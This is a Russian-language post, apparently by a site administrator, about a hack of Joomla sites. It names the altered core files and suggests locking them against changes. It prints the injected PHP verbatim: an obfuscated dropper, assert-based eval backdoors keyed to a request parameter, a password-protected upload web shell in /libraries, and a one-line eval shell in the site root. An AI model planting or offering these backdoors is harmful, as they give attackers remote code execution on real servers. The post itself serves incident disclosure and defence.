Столкнулся с изменением файлов на сайтах CSM Joomla, данные вписываются в базовые компоненты и библиотеку, злоумышленник делает загрузку файлов. профиклактика - заблокировать изменение этих файлов.
В поиске изменений помог компонент проверки файлов.
Ниже приведен код этого взлома, текст размещен для ознакомления, а не как инструкция к действию = )
Измененные файлы:
/components/com_contact/helpers/route.php
$content = '<?php (';$content .= '$_=';$content .= '@$_G';$content .= 'ET[c]).@$_($_P';;$content .= 'OS';$content .= 'T["f5a3p5"])?>';$file = fopen("com_contact_info.php", "w");fwrite($file, $content) ;
/components/com_media/media.php
isset($_REQUEST['f5a3p5']) && array_map("ass\x65rt",(array)$_REQUEST['f5a3p5']);
/includes/defines.php
isset($_REQUEST['f5a3p5']) && array_map("ass\x65rt",(array)$_REQUEST['f5a3p5']);
Далее размещается файл для загрузки файлов, было 3 случая, каждый раз разные файлы но в папке /libraries
/libraries/joomla/http/wrapper/cgi-f7.php
<?php if(md5($_GET["ms-load"])=="5637a21308208bf4b96294544bf880a2"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data" method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}
Также в корне сайта создается файл com_contact_info.php:
<?php ($_=@$_GET[c]).@$_($_POST["yp5s2z"])?>